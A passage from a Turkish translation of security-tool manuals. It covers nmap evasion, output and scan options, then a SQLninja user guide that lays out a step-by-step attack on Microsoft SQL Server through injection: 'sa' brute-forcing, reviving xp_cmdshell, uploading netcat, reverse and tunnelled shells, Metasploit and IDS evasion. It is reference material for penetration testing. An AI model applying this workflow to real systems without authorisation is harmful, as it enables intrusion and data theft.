sunucuya ağ yönlendirmesini saptamak gibi konularda hala bazı
yararlı işlemler yapılabilir.
Bu konuda daha neler yapılabileceğini görmek için
http://seclists.org/nmap-dev/2006/q3/52 web sayfasına bakabilirsiniz
--ttl (IP için bırakmanın zamanıdır bilgi alanı)
IPv4 zaman aşımı süresini belirtmek için kullanılır.

--randomize-hosts (hedef sunucu sırasını rastgele karıştırmak)
nmap programına içinde 16384 kadar sunucu bulunan grupların
sunucu sıralarını tarama başlamadan karıştırmasını bildirir. Böylece
bazı ağ yönetim sistemlerine karışık tarama sistematik tarama gibi
gözükmek. Bir başka çözüm ise hedef sunucu IP listesini tarama
listesinden yararlanarak elde etmek (-sL -n -oN ) ve bir
Perl programıyla karıştırmaktır. Daha sonra tüm liste nmap programına
-iL ile sunulur.
--spoof-mac
(MAC adresini gizlemek)
Bu seçenekle nmap programına gönderdiği tüm raw ethernet
parçalarında MAC adres olarak burada yazılanı kullanması söylenir. Bu
seçenek “--send-eth” seçeneğini ima eder. Ver,len MAC bir çok kalıpta
olabilir. Eğer yalnız 0 girilmişse nmap oturum için tümüyle rastgele bir
MAC adresi seçer. Eğer yazılan onaltılı sayılarsa aralarında ':' bulunur.
Eğer 12'den az bayt yazılırsa nmap arkasını rastgele sayılarla doldurur.
Nmap olası çakışmaları önlemek, üretici firma çelişkilerini kaldırmak
için gereken düzeltmeleri kendisi yapar.
--badsum (kontrol toplamı bozuk TCP/UDP paketleri gönderme)
Burada amaç TCP, UDP ve SCTP kontrol toplamlarını (checksum) hatalı
girmektir. Genelde tüm IP yığınları (stack) bu tür paketleri hemen siler
ama gelecek bir yanıt olursa da ya güvenlik kalkanından ya da
IDS'dendir. Ayrıntılar için http://nmap.org/p60-12.html adresine
bakabilirsiniz.
--adler32 (SCTP için CRSC32C yerine artık kullanılmayan Adler32 kullan)
Bu seçenekle SCTP kontrol toplamı için eski Adler32 algoritması
kullanılması nmap programına iletilir. Burada amaç eski yöntemle
üretilen kontrol toplamına sistemlerin nasıl yanıt verdiğinin
bulunmasıdır.
Çıktılar
Her hangi bir güvenlik aracı ürettiği çıktıların anlaşılabilirliği ve çokluğuyla
değer kazanır. Karmaşık deney ve algoritmaların değeri öyle çok değildir.
Nmap kullanıcıları, ve bunu çağıran diğer yazılımlar göz önüne alındığında
tek kalıptan çıkan bir rapor kimseyi mutlu etmeyecektir. Bu nedenle nmap
bir çok kalıp sunar. Bunların arasında insanlar için etkileşimli konumda ve
XML kalıplarında üretilen çıktı biçimleri de vardır.

Değişik çıktı kalıplarına ek olarak nmap çıktılardaki ayrıntıların kontrolünü ve
denemelerde kullanılan açıklamaları da kullanıcıya sunar. Çıktılar yazıcıya
gönderilebileceği gibi adlandırılan bir dosyaya da taşınabilir. Çıktı dosyaları
çalışamayan dump eden oturumlarda sorunu anlamak için de kullanılır.
Nmap çıktıları beş değişik kalıpta hazırlar. Varsayılanı etkileşimli çıktıdır ve
terminale gönderilir. Normal çıktı da vardır. Etkileşimliye benzer terminale
gönderilir ama daha az çalışma zamanı bilgisi ve uyarıları içerir.
XML çıktısı en önemli çıktı kalıplarından biridir. HTML'e çevrilebilir,
programlar tarafından kolaylıkla çözümlenebilir ve grafik arayüzü kullanan
programlarla kullanılabilir ve veri tabanına taşınabilir.
Geride kalan iki çıktı biçimi “grep” ile kullanılabilecek çoğu hedef sunucuya
ait çıktılar ve kendilerini

Nmap Çıktı Kalıpları
-oN (normal çıktı)
Normal çıktı belirtilen dosya adına taşınır.
-oX (XML çıktısı)
Burada XML çıktısının doğrudan bir dosyaya yazılması
istenmektedir. Nmap XML ile birlikte Doküman tipi tanımı (DTD)
de hazırlar. Böylece XML çözümleyen program nmap XML
çıktısının geçerliliğini kontrol edebilir. En son sürüm her zaman
https://svn.nmap.org/nmap/docs/nmap.dtd adresinden
sağlanabilir.
XML değişmez bir kalıp hazırlar. Bunun gramerinin programla
incelenmesi her zaman kolaydır. XML dil bilimi (grammer)
incelemesi birçok programlama dili için ücretsiz olarak vardır.
Nmap çıktılarında XML tüm uygulamalar için en kullanışlı kalıptır.
XML çıktısı HTML olarak kullanılabilecek XSL stil sayfaları da
üretir. Bunun en kolay yolu XML çıktısını Firefox ya da IE gibi bir
tarayıcıya yüklemektir. Varsayılan olarak bu yöntem nmap'in
çalıştırıldığı sunucu için geçerlidir. “--webxml” ya da
“--stylesheet” seçenekleri taşınabilir XML dosyaları üretmek için
gereklidir. Bunlar taşındıkları yerde HTML olarak görünebilirler.
-oS (ScRipT KIdd|3 çıktısı)
Bu çıktı aynı etkileşimli çıktı gibidir. Yazımı ve diğer özellikleriyle
eğlenceye dönük bir çalışmadır.
-oG (grep ile içindekiler aranabilecek çıktı)
Bu çıktı biçimi en son ele alındı çünkü artık kullanılmamaktadır.
XML biçimi buna göre çok daha kullanışlıdır.
-oA (Her tür kalıba uygun çıktılar)
Bu biçimde tanım yapıldığında kalıbın türüne göre dosya adı
.xml, .nmap gibi adlar
alır..

Ayrıtılar ve onarım çıktısı seçenekleri
-v (ayrıntı düzeyini yükselt) , -v
Ayrıntı düzeyini yükseltmek için kullanılır. Böylece tarama
hakkında daha geniş bilginin yazılması sağlanır. Bulunan açık
kapılar gösterilir, nmap tarama uzun sürecekse (dakikalar
düzeyinde) tamamlanma süresi bildirilir. Daha çok ayrıntı için bir
kez daha kullanılabilir. Örnek “-v3”.
Bir çok değişiklik yalnız etkileşimli çıktıyı etkiler. Diğer çıktılar
daha çok makineler için olduğundan varsayılan olarak gereken
ayrıntı zaten verilmiştir. Bazı ayrıntılar istenirse yazdırılır.
Örneğin grep çıktısında taranan kapılara ilişkin açıklama ancak
istenirse eklenir, çünkü gereğinden çok daha uzun olabilir. Diğer
çıktılarda yapılacak bir kaç değişiklikle ayrıntılar atlanarak çıktı
boyu kısaltılabilir.
-d (onarımların düzeyini yükselt) , -d
Ayrıntılar size hala istenilen bilgiyi sağlayamamışsa, onarımlarda
kullanılan çıktıların düzeyini yükselterek daha fazla bilgi sahibi
olabilirsiniz. Bu seçenek “-g” ile etkinleştirilir. Ayrıca onarım
düzeyini “-d” seçeneği, büyüterek daha fazla bilgi edinebilirsiniz.
--reason (Sunucu ve kapı durumu)
Her kapının neden belirgin bir konumda olduğu ve sistemin
neden çalışır ya da kapalı olduğu bu seçenekle gösterilir. Bu
seçenek sunucu ya da kapının durumunu gösteren paketi
yazdırır. Kapalı kapıdan gelen bir RST paketi ya da canlı bir
kapıdan gelen yankı yanıtı bu tür paketlerdir. Nmap tarafından
verilen bilgi tarama mı yoksa ping işlemi mi olduğuna göre
değişir. Onarım seçeneği başlatılınca bu otomatik olarak
etkinleştirilir. Sonuçlar XML dosyasına yazılır.
--stats-every (periyodik zaman durumlarını yaz)
Belirtilen zaman aralığı sonunda zamanlama durum
mesajı yazdırı. Örneğin “--stats-every 10s” seçeneği her 10
saniyede durum güncellemesi yapılıp yazdırılması anlamına
gelir.

--packet-trace (Paketleri, gönderilen verileri ve alınanları izle)
Nmap her gönderilen ve alınan paket bir özetini yazdırır. Binlerce
satır yazdırmak yerine “-p20-30” seçeneğinde olduğu gibi
seçilen kapılara ilişkin özet bilgiyle yetinmek isteyebilirsiniz.
Yalnız sürüm belirlemeyle ilgili izleme için “--version-trace”
seçeneğini kullanabilirsiniz. Kullanılan programları izlemek için
“--script trace” kullanılırken “--paket-trace” hepsini içerir.
--open (Yalnız açık ya da açık olabilecek kapıları göster)
Bazı koşullarda siz yalnız bağlanabileceğiniz kapılarla
ilgilenirsiniz. Kapalılar, kapalı|elemeliler ve elemelilerin sonuçları
sizi ilgilendirmez. İsteklere göre çıktı taraması grep, awk ve Perl
sonrasında yapılır. Ancak bu özellikler istek üzerine eklenmiştir.
“--open” kullanıldığında açık, açık|elemeli, ya da elemesiz
kapıların yazılması istenir.
--iflist (arayüzleri ve route (yönlendirme) listeleri)
Nmap tarafından saptanan arayüzleri ve yönlendirmeleri
yazdırır. Bu yönlendirme sorunlarını düzeltmek için kullanılabilir.
Diğer çıktı Seçenekleri
--append-output (Çıktıları dosyaya ekle)
Bir çıktı için dosya_adı tanımlamışsanız (-oX ya da -oN gibi), o
dosyanın varsayılan olarak üzerine yazılır, eski bilgiler silinir. Eski
bilgileri saklamak isterseniz “--append-output” seçeneğini
kullanırsınız. Ancak bu işlem XML dosyası için çok güzel
çalışmaz. Sonunda çıkan dosyayı elinizle düzeltmeden programla
taranıp anlamlı sonuç elde edilmesi olanaksız olur.
--resume (Dump eden taramayı durdur)
Bazı Nmap çalışmaları günlerce sürebilir. Bunlar her zaman son
bulmaz da. Sınırlamalar nmap programının iş saatlerinde
çalışmasını engelleyebilir. Ağ işlemez duruma gelebilir. Beklenen
ya da beklenmeyen yeniden başlatmalar (reboot) olabilir. Ctrl-C
tuşlarına basıp tüm taramayı baştan başlatmak söz konusu
olabilir. Eğer “--resume” seçeneği kullanılır ve dosya adı olarak
normal/grep dosyalarından birinin adı verilirse nmap kaldığı
yerden taramaya devam edebilir. Yeni bulunan sonuçlar da bu
dosyanın arkasına eklenir.

--stylesheet
(Set XSL stylesheet to transform XML output)
Nmap XML çıktılarını HTML olarak görüntülenmesi için nmap.xsl
dosyasıyla birlikte gönderilir. XML çıktısı içinde xml stil sayfaları
komutları bulunur ve nmap.xml dosyasını gösterir. XSLT
işlemciyle (xlstproc gibi) XML dosyası çalıştırıldığında HTML
dosyası elde edilir. XML dosyasının doğrudan web tarayıcı altında
açılması artık düzgün çalışmamaktadır. Eğer farklı stil sayfaları
kullanılacaksa “--stylesheet” seçeneği ile tanımlanabilir. Örneğin
“--stylesheet http://nmap.org/svn/docs/nmap.xsl”. Aynı işlem “--
webxml” seçeneğiyle de yapılabilir. Eğer URL adresinden XSL
alınırsa, üzerinde nmap olmayan sunucuda da HTML dosyası
elde edilebilir.
--webxml (Yazma stillerini Nmap.Org sitesinden indir)
“--stylesheet” seçeneğiyle aynıdır.
--no-stylesheet (XML içinde XSL stillerini görme)
Nmap programının XSL üretmemesi için kullanılır.
Diğer Seçenekler
Önemli ya da önemsiz ama hiç bir yere uymayan seçenekler burada
anlatılmıştır.
-6 (IPv6 taramasını etkinleştir)
Nmap'in en ünlü seçenlerinden biri IPv6 desteği olmasıdır. Ping ve kapı
taramada, sürüm belirlemede ve nmap program makinesinde IPv6
desteği vardır. Genel dil kuralı diğer seçeneklerde aynen kullanılır ama
ek olarak “-6” seçeneği de yazılmalıdır. Eğer sunucu adı yerine
adresini yazacak olursanız burada IPv6 standardı kullanmanız
gerekecektir. Önerilen sunucu adının kullanılmasıdır çünkü IPv6 adresi
3ffe:7501:4819:2000:210:f3ff:fe03:14d0 gibidir. Çıktı da benzerdir
ama ilgilenen kapı adresleri IPV6 türündendir.

Şu anda IPv6 adreslemesi pek kullanılıyor görünmese de bazı ülkelerde
etkinliği artmakta, yeni işlem sistemlerince desteklenmesi
sürmektedir. Nmap tarafından kullanılabilmesi için hem hedef hem de
kaynak bilgisayarlar IPv6 için ayarlanmış olmalıdır. Eğer ISS sizin için
bir IPV6 ataması yapmamışsa, ücretsiz tünel sunanlar her tarafta
varlar ve nmap ile kolaylıkla çalışırlar. Ücretsiz IPv6 tünel sağlayıcıları
için http://www.tunnelbroker.net/ adresine bakın.
Windows ortamında IPV6 taraması ethernet cihazlarında
desteklenmektedir (tüneller kullanılamaz).
-A (agresif tarama seçenekleri)
Bu seçenek ek agresif ve gelişmiş seçenekleri etkinleştirir. Şu anda bu
seçenekle işletim sistemi tanımlama (-O), sürüm belirleme (-sV),
program tarama (-sC) ve “traceroute” bu seçeneğe eklenebilir.
Gelecekte başka özellikler de eklenebilir. Önemli olan insanların bir
çok parametreyi kullanmak için ezberlemesine gerek olmadan bu
seçenekleri kullanabilmeleridir. “-A” seçeneğini hedef ağlarda izin
almadan kullanmak doğru olmayabilir. “-T4 ve -V” seçenekleriyle
beraber kullanılması da doğru değildir.
--datadir (Nmap veri dosyası yolunu tanımlama)
Nmap çalışırken bazı özel veriler kullanır. Bunlara nmap-servismesajları
(nmap-service-probes), nmap-servisleri (nmap-services),
nmap-protokolleri (nmap-protokols), nmap-rpc, nmap-mac-prefixes ve
nmap-os-db. Eğer bu dosyaların yeri “--servicedb” ya da “–versiondb”
seçenekleriyle belirlenirse, dosyalar için bu yol kullanılır. Daha sonra
nmap “--datadir” yolunda bu dosyaları arar. Bulunamayan dosyalar
NMAPDIR çevre değişkeninin gösterdiği yerde aranır. Daha sonra
~/.nmap (gerçek ve etken UID için), ya da Windows için
\AppData\Roaming\nmap (burada HOME C:\Users\user gibi
kullanıcının ev yoludur). Peşinden nmap programının bulunduğu
yerdeki yola ../share/nmap eklenmesi ile arama tamamlanır (örneğin
/usr/local/share/nmap gibi)
--servicedb (kullanıcı servis dosyasının yeri)
Nmap için nmap-services dosyası yerine bu seçenekle belirtilen
dosyanın kullanılması istenebilir. Bu dosyanın tanımlanması “-F” hızlı
tarama seçeneğini etkinleştirir.

--versiondb
(Servis mesajları dosyasının yeri)
Nmap programından özel servis mesajları dosyası kullanması bu
biçimde istenir.
--send-eth (Ham ethernet mesajları göndermeyi kullan)
Nmap programından IP (ağ) düzeyinde veri göndermesi yerine
ethernet düzeyinde ham veri göndermesi istenirse bu seçenek
kullanılır. Çalıştığı platformda hangisini kullanmak daha iyiyse nmap
varsayılan olarak onu seçer. Genelde Ham soket (IP düzeyi) en verimli
kullanım biçimidir. Ama windows ortamında ethernet paketleri
kullanılmalıdır. Çünkü Microsoft ham IP soketleri kullanımına izin
vermez. Nmap UNIX ortamlarında başka bir seçeneği kalmamışsa ham
IP kullanmayı seçer.
--send-ip (Ham IP düzeyi mesaj gönder)
Nmap'in paketleri ham IP olarak göndermesini ister. Windows için
kullanılamaz.
--privileged (Kullanıcının tam yetkili olduğunu varsay)
Nmap programına ham soket mesajları göndermeye yetkili
olunduğunu bildirir. Varsayılan olarak nmap işlemi yapıp geteuid
sonunda sıfırdan farklı bir sonuç alırsa işlemi durdurur.
--unprivileged (Kullanıcı ham paket gönderemez)
Nmap programına kullanıcının yetkisiz olduğu ve ham soket verisi
gönderemiyeceği bildirirlir.
--release-memory (Programdan çıkmadan belleği boşalt)
Bellek sızıntılarının düzeltilmesinde önemli bir seçenektir. Nmap işin
bitirmeden kullanığı belleği boşaltır. Böylece gerçek bellek sızıntıları
daha kolay bulunabilir. Normal koşullarda nmap bununla ilgilenmez
işletim sistemi bu işi yapar.
-V; --version (Sürüm numarasını listele)
Nmap sürüm numarasını listeler ve işlem son bulur.

-h; --help (Yardım sayfasını listele)
Kısa yardım sayfası listeler. En sık kullanılan komutlar, ayarlar burada
tanımlıdır. Hiçbir parametre vermeden nmap çalıştırılırsa da aynı sonuç
elde edilir.
Çalışırken araya girme
Nmap çalışırken tüm tuş hareketini yakalayabilir. Böylece programı
durdurmadan onunla etkileşime girilebilir. Bazı özel tuşlar seçenekleri
değiştirebilir, diğerleri tarama hakkında bilgi verebilir. Genel bir kavram
olarak küçük harfler yazdırılanları çoğaltırken büyük harfler azaltır. Yardım
için “?” girilebilir.
v / V
Ayrıntıyı arttır/azalt
d / D
onarım satırlarını arttır/azalt
p / P
Paket taramasını aç/kapa
?
Etkileşimli yardım ekranını görüntüleme screen
Başka ne varsa
Aşağıdaki gibi durum mesajı ver:
Örnekler
Stats: 0:00:07 elapsed; 20 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 20:57 (0:00:12 remaining)
Nmap kullanımını gösteren bazı örnekler aşağıda gösterilmiştir. En
basitinden, en sık kullanılanından ve en karmaşık olanına değin bir kaç örnek
buraya alınmıştır. Bazı örneklerde IP adresleri ya da yöre adları değişmez
kullanılmıştır.
nmap -v scanme.nmap.org

Tüm kapılar taranır ve çıktı ayrıntılı olacaktır.
nmap -sS -O scanme.nmap.org/24
C tipi bir ağda (256 IP) SYN taraması yapılacaktır. Ayrıca bu bilgisayarlarda
hangi işletim sisteminin bulunduğu da belirlenecektir.
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
B tipi ağ adresinde her 255 bilgisayarın ilk yarısında TCP taraması ve sayısal
olmayan adlandırma yapılması istenir. Burada sistemlerdeki standart
kapılarda SSH, DNS, POP3 ya da IMAP olup olmadığı taranır, açık olan
kapılarda sürüm belirlemesi ve arkasında koşan uygulama belirlenir.
nmap -v -iR 100000 -Pn -p 80
Nmap'den rastgele 100,000 sunucu seçmesi istenir. Bunların web sunucu
servisi taranır (80 nolu kapı). Sunucu adlandırması -Pn ile kapatılmıştır.
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pbport80scan.gnmap
216.163.128.20/20
Ping kullanmadan 4096 IP web servisi için taranır ve sonuç grep ile
okunabilen ve XML kalıplarında saklanır.

Ek-2
SQLninja Kullanıcı El Kitabı
Giriş
Gereksinim
Arkada Çalışanlar
Nasıl Kullanırız
Saldırı Konumu
Onarımlar
Parmak İzi
Kaba Kuvvet
Artma
Xp Diriltmek
Yüklemek
dir kabuk komutu
Geri tarama
Ters kabuk
ICMP Kabuğu
DNS tüneli
metasploit
SQL komutu
Veri alma
Diğer Saldırılar
Yapılandırma Dosyası
Temel İşlemler
Veri çıkartma Seçenekleri
Gelişmiş Seçenekler
Diğer Yararlı Bilgiler
Krediler
Kabul Etmeme
Geri Besleme
Akıllılık
Yazarlar

Giriş
Burada yazılanlarda SQLninja sanki hep var olan hedef sunucuya kırıl veri
tabanına eklentiler yapacak, ya da veri tabanından bilgi çekecekmiş gibi
gözükmektedir. Ama madalyona bir de diğer taraftan bakmak gerekir.
Kırılacak güvenlik önlemleri varsa güvenlikte sorun da vardır. Güvenlik
yönetiminin yapacağı kırılması söz konusu olan güvenliği kalkan ya da
yazılım desteği ile yenilemek, koruma önlemleri almaktır.
SQLninja'nın hedefi web uygulamalarındaki Microsoft SQL Sunucunun SQL
eklemeleriyle kırılganlığını belirlemek ve içine sızmaktır. Arkada çalışan
sunucu GPL V3 ile kullanıma açıldı.
SQLninja'nın ana hedefi uzaktaki Veri Tabanı Sunucusuna etkileşimli işletim
sistemi düzeyinde erişimdir. Bunu ağ içinde köprü başı olarak kullanmaktır.
Bir onarım özelliği olarak veri tabanından veri de çıkarabilir.
Uzaktaki SQL Sunucunun parmak izlerini almak (sürüm, query
çalıştıran kullanıcı adı, kullanıcı yetkileri, XP komut kabuğu varlığı, Veri
Tabanı Sunucu yetki konumu.
'sa' şifresini zorla alma (yalnız windows 2000 için)
'sa' ya verilen yetkiler (yalnız windows 2000 için)
Kullanıcı komut kabuğu yaratılışı (eğer var olan kaldırılmışsa)
Çalışan programların yüklenmesi
Ters kabuk işlemi için uygun kapı bulmak adına ters tarama
TCP ve UDP için doğrudan ve ters kabuk
Bağlantı kabuğu için kapı yoksa DNS'si tünellenmiş kabukumsu
ICMP tünellenmiş kabuk, Eğer hedef Veri Tabanı Yönetim Sistemi ICMP
ile konuşabilirse, ICMP yankı ile makineye saldırılabilir.
Meterpreter kullanmak istediğinizde, ya da GUI kullanıcı arayüzü ile
erişmek istediğinizde Metasploit döndürmesi olacaktır.
Uzaktaki Veri Tabanı için İşletim Sİstemi yetkileri çıkarılması
WAITFOR arayüzü kullanarak ya da DNS tabanlı tünellerle uzaktaki Veri
Tabanından Veri çıkartma
Bunların hepsi IDS/IPS Sistemlerinin ve SQL kodunun kafasını
karıştırarak yapılır.

Görebildiğiniz kadarıyla SQLninja, SQL içine girecek kırılganlıkları aramaz.
Hali hazırda bunları yapan bir çok araç zaten vardır (BurpSuite
http://portswigger.net/suite gibi). Gösteriler hep daha önceki sürüme aittir
ama aracın yapabildiklerini anlamak açısından oldukça iyi sonuçlardır. Bu el
kitabını dikkatlice okuyun (evet hepsini), SQLninja seçenekleri arasında nasıl
iş yapabileceğiniz, içinde neler olduğu anlatılır. Uzun ve sıkıcı gelebilir. Ama
SQLninja'nın bir çok seçeneği olduğundan belgenin tümünü okumaya çalışın.
Bir çok aracı doğru kullanabilmenizi ve çok zaman kazanmanızı sağlar.
Gereksinim
SQLninja tümüyle Perl ile yazıldığından, kurulacak fazla bir şey yoktur.
Perl ve eğer yoksa aşağıdaki modüller gerekir:
NetPaket, NetPcap, NeDNS, NetRawIP, IQ-Socket SSL, DBI,
Ayrıca Metasploit Framewor 3 de gerekecektir. Metaspoilt saldır
konumunda kullanılacaktır. Ayrıca VNC istemci de kurulmalıdır.
Eğer bir şeyler ters giderse, ayrıntılı çıktıyı etkinleştirin (-V seçeneği)
ya da onarım seçeneğini (-d). Böylece hatanın nedenini bulacak ip
uçlarına erişebilirsiniz. Gentoo kutusunda geliştirildiğinden SQLninja
aşağıdaki sistemlerde kullanılabilir:
Linux, FreeBSD, Mac OS X, OS
Arkada Çalışanlar
Web uygulamasında SQL Sunucu kullanılıyorsa ve siz de SQL'i kırıp
içine girebiliyorsanız hemen denemeler yapın. Eğer 'sa' olarak
sorgulama yapabiliyorsanız ve XP komut kabuğu kapatılmamışsa,
hemen sunucuya netcat indirin (ftp ya da tftp ile) ve sonunda sizin
doğrudan ters kabuğunuzu bulun. Bir çok kez işler bu kadar kolay
olmaz. Bazen güvenlik kalkanı tüm giriş ve çıkışları elenmiştir. Ya da
ter kabuk yalnız tuhaf bir cihaz için vardır. Ya da XP komut kabuğu hiç
yoktur. Ya da sorgulamalarınız düşük yetkiyle yapılabilmektedir. Ya da
bunların hepsi birden olmuştur. SQLninja uzaktakinde ters kabuk nasıl
yaratılacağı konusunda (bu koşullarda bile) yardımcı olabilecek ip
uçları üretebilir. Bu da başarısız olursa, Uzaktaki veri tabanı yönetim
sisteminden hala bazı verileri sıkıştırıp çıkarabilir.

Çok iyi SQL ekleme teknikleri bildiğinizi ve Microsoft SQL Sunucusunun
iç yapısını iyi bildiğinizi varsayalım. Eğer bundan sonra olanları
anlamakta güçlük çekerseniz
http://www.northernfortress.net/advanced_sql_injection.pdf,
http://www.northernfortress.net/more_advanced_sql_injection.pdf,
http://www.northernfortress.net/sqlinference.pdf
belgelerini okumanızı öneririz. Ayrıca protokol tünellemenin ne
olduğunu bildiğinizi varsayıyorum. Özellikle ICMP ve DNS üzerinden
yapılanları biliyorsunuzdur. Bilmiyorsanız lütfen http://dnstunnel.de/
web sitesinden DNS kavramını öğrenin.
Nasıl Kullanırız
SQLninja davranışı yapılandırma dosyasıyla denetlenir (varsayılan
dosya adı sqlninja.conf). Bu dosyadaki ayarlar neye ve nasıl
saldırılması gerektiğini anlatır (hedef sunucu, kırılabilen sayfalar,
kullanılabilecek diziler gibi) ve sqlninja'ya neler yapılacağını
anlatabilen bazı komut satırı seçenekleridir. Bu komut satırı
seçenekleri aşağıdakilerdir:
-m
Saldırı konumunu belirtir. Temel olarak sqlninja'ya ne
yapması gerektiğini söyler. Yapılabilecek işlerler şunlardır:
test
parmak izi (fingerprint)
kaba kuvvet (bruteforce)
artırma (escalation)
xp diriltmek (resurrectxp)
yüklemek (upload)
dir kabuğu (dirshell)
arka tarama (backscan)
ters kabuk (revshell)
dns tüneli (dnstunnel)
icmp kabuğu (icmpshell)
metasploit
sql komutu (sqlcmd)
veri al (getdata)
-v
ayrıntılı çıktı
-f
kullanılacak yapılandırma dosyanı tanımlar

-p
artırma konumunda o anki kullanıcıyı sistem admin
listesine ekler. Diğer konumlarda sorgulamayı yönetici
yetkisiyle çalıştırır. (Eğer veri tabanı kullanıcısı bu tür bir
grupta değilse). Bu seçenek normalde çok seyrek kullanılır.
Varsayılan olarak kullanıcıyı sysadmin grubuna ekler ('sa'
şifresi bulunduğunda). Bunu ne zaman kullanmak gerekir
diye soruluyorsa attırma konumuna bakmak gerekir.
-w
kaba kuvvet konumunda kullanılacak kelime listesi
tanımlanır.
-g
Yükleme konumuyla birlikte kullanılır, onarım programı
üretir ve çıkar.
-d
Onarım işlemlerini başlatır ve aşağılarda neler olduğu
incelenebilir. Olası değerleri şöyledir:
1 eklenen her sql komutunu yazdır
2 hedefe gönderilen her HTTP isteğini yazdır.
3 Hedeften gelen her HTTP yanıtını yazdırır
all Yukarıdakilerin hepsi
Hangi parametrelerin kullanılacağını anlamak için bu konumların
tanımlarına bakın.
Saldırı Konumu
SQLninja'nın şu anda 14 değişik saldırı konumu vardır.
sqlninja -m upload
sqlninja -m U
sqlninja'yı parametresiz çalıştırınca konumları ve parametreleri listelenir.
Değişik saldırı gruplarının ilkini yakalamak için sqlninjayı kullanmanın tipik
yolları şunlardır:
1 Yapılandırma dosyası ayarları ve test konumuyla o SQL komutunun
doğru olarak eklendiğini gör.

2 Parmak izi konumuyla karşıdaki veri tabanının parmak izini al
3 Eğer gerekliyse kaba kuvvet konumunu kullanarak 'sa' şifresini bul
ve yetkileri arttır (Yalnız Windows 2000).
4 Eğer gerekliyse xp diriltme konumuyla gelişmiş xp komut kabuğu
yaratma işlemini yarat (Windows 2000 için)
5 Yükleme konumunu kullanarak netcat yükle.
6 Bir kapı üzerinden Veri Tabanı sunucusuna erişilmişse, dir kabuk
konumunu kullanarak doğrudan kabuk alternatifini bul. Eğer kapı TCP
ise metasploit konumunu kullanarak grafik erişimi başlat.
7 Aksi halde ters tarama konumu ile çıkış için kullanılan tcp/udp
kapısını bul.
8 Eğer 7. adım başarılıysa, ters kabuk konumunu kullanarak, ters
kabuğu bul ve kapı TCP ise metasploit konumu ile grafik erişimi kullan.
9 Eğer 8. adım çalışmamışsa icmpsh.exe programını yükle ve icmp
kabuk konumunu kullanarak icmp-tünel kabuğu bul.
10 Eğer 9. adım çalışmazsa dnstun.exe programını yükle ve dns tünelli
yalancı kabuğu bul.
11 Eğer 10. adım çalışmazsa veri alma konumuna geç ve veri
tabanından veri almaya başla.

Onarımlar
Kısaca t yazılabilir.
Parametresi yoktur.
Bu konum ilkel WAITFOR DELAY ile karşı tarafta işlemin başarılı bitip
bitmediğini izler. Yapılandırma dosyanızın doğruluğu ve eklemenin
çalışıp çalışmadığı denenmiş olur.
Parmak İzi
Kısaca f yazılabilir.
Parametre olarak -p yazılabilir
WAITFOR tabanlı kör bir ekleme kullanır. Bu konum karşı sistemin
parmak izini çıkarır. Aşağıdaki bilgiler alınabilir:
Veri Tabanı sürümü (2002/2005/2008/2012 gibi)
Sorgulamaları yapan kullanıcı
Kullanıcı sistem yöneticisi grubunda mıdır?
Bu kullanıcıya xp komut kabuğu (xp cmdshell) açık mıdır?
Karşı sistem karışık mı yoksa yalnız windows'a özgü Şifreleme mi
kullanmaktadır ('sa' şifresine kaba kuvvet uygulayacaksanız
bunu bilmek gerekir)
SQL Sunucu SYSTEM olarak mı koşturulmuştur. Bu aynı zamanda
churrasco.exe doğru yüklendi mi ve yetkileri doğru arttırıyor mu
incelemesi de yapılmasını sağlar.
Var olan veri tabanının adı.
Eğer SQL Sunucu 2000'e saldırılıyorsa, kullanıcılar sysadmin grubunda
değildir, ama doğru 'sa' şifresi parametre olarak verilmiştir. Böylece
parmak izi yönetici yetkileriyle yapılır. WAITFOR tekniği diğer araya
girişlere göre çok daha yavaştır ama en esnek olanıdır. Zaman
ölçümlerinde diğer işlem trafiği ve sunucu yükü etkin olsa da parmak
izini bir kaç kez yinelemek isteyebilirsiniz. Bunu ilk sonuç tatmin edici
değilse yaparsınız. Ya da yapılandırma ayarlarındaki kör zamanlama
(blindtime) parametresiyle de yapabilirsiniz. Kullanıcının SQL
Sunucusuna parmak ixi uygularken aşağıdakilerin sunucuda olması
gerekir:

xp_cmdshell (ya da benzeri)
whoami.exe. Bu Windows 2003'de var, ama karşı tarafta yoktur
derseniz microsof.com'dan indirip karşı sisteme yükleme yapabilirsiniz.
(http://sqlninja.sourceforge.net/sqlninja-howto.html#upload_ nasıl
yapılacağını anlatır)
Kaba Kuvvet
Kısaca b yazılabilir
Parametreleri -w
Bu konum, kullanıcı sysadmin grubunda değilse kullanışlıdır. O zaman
yetkilerin arttırılması gerekir. OPENROWSET ile hedefin veri tabanını
alternatif güvenlikle kendine bağlarız. 'sa' şifresini kaba kuvvetle
bulmaya çalışırız. Eğer doğru şifre bulunursa, mevcut kullanıcı hemen
'sa' grubuna eklenir. Bu saldırının çalışması için karşıdaki SQL sunucu
karışık şifreleme kullanıyor olmalıdır. Parmak iziyle bunun doğruluğuna
bakılmalıdır. Bu saldırı konumu iki değişik yöntem kullanır: sözlük ve
arttırımlı. Hangisini kullanacağınız tümüyle size kalmıştır.
Sözlük
Eğer kelime listesi tanımlanmışsa kullanılır. Buna göre olası
şifreler kelime listesinden bakılarak aranır. Kelime listesinde 'sa'
ve boş şifre olduğuna bakın. Bunlar MS SQL için çok sık
kullanılan şifrelerdir.
Pros:
Eğer şifre bir sözlük kelimesiyse çok etkilidir
Veri Tabanı sunucusuna ağır bir yük getirmez.
Cons:
Sözlüğe dayanmayan şifreler için etkili değildir. Eğer
kelime listenizde şifre yoksa sonuç elde edemezsiniz.
Çok fazla bağlantıya gereksinimi olduğundan web
kayıtlarına bakınca saldırı hemen anlaşılabilir
Artırımlı
Kelime listesi kullanılmadığında bu yönteme geçilir. SQLninja bir
dizi sorgulama gönderip “*ALL*” deneyerek kullanıcı tarafından
saptanan uzunlukta kombinasyonlar yaratır. Bu taktiğin güzel
yanı sorgulamalar veri tabanı sunucusunda olduğundan kaba
kuvvet aslında karşı sistemin CPU kaynakları kullanılarak yapılır.
Pros
Cons
Sözlük tabanlı olmayan şifreleri bulmada oldukça etkindir
Çok az bağlantıya gereksinim vardır, bu nedenle web
sunucu kayıtlarında çok az bilgi vardır.
Eğer şifre uzunsa yıllar alabilir
Veri Tabanı sunucusunun CPU kullanımını %100'e

çıkarabilir. Canlı ortamda tehlikelidir (fark edilebilir). CPU
kullanımı çok yükselince kritik veri tabanlarında alarm
uyarısı üretilir. Güvenlik ölçüsü olarak sqlninja işlemi küçük
